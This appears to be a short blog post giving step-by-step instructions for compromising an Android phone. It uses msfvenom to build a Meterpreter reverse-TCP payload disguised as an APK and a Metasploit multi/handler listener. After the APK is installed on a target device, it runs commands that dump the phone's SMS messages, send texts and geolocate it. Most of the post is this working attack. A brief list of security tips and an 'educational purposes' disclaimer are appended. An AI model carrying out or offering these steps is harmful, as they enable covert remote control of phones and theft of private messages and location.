Ticker

10/recent/ticker-posts

Using Metasploit payload in Kali Linux to Hack Android devices 2017


Switch to Kali Linux and open a terminal -


In terminal write the following:


msfvenom -p android/meterpreter/reverse_tcp LHOST=your_IP_address_here LPORT=any_port_number R>

/root/Desktop/Filename.apk


Once you enter the above command a file name Filename.apk will be created in the Desktop.


Open a new terminal and type the following commands one at a time.



service postgresql start
msfconsole

use multi/handler
show options
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST your_IP_address_here
set LPORT port_number_you_specified_earlier
exploit




Now copy the Filename.apk and to your android device and install it. Once installed open the apk file with name (Main

activity)


Switch back to Kali Linux and you will notice a meterpreter session:


Type the commands:


sysinfo

dump_sms
send_sms -d destination_phone_number -t "Test"
wlan_geolocate


Its easy to hack an android phone with this few steps. To be secure from hackers:


1. Install an antivirus
2. Do not download or install third-party apps

3. Do not click on links unnecessary

4. Turn off the internet if not in use

5. Regularly update software both application and system software.


Note: The tutorial is for educational purposes.

Post a Comment

0 Comments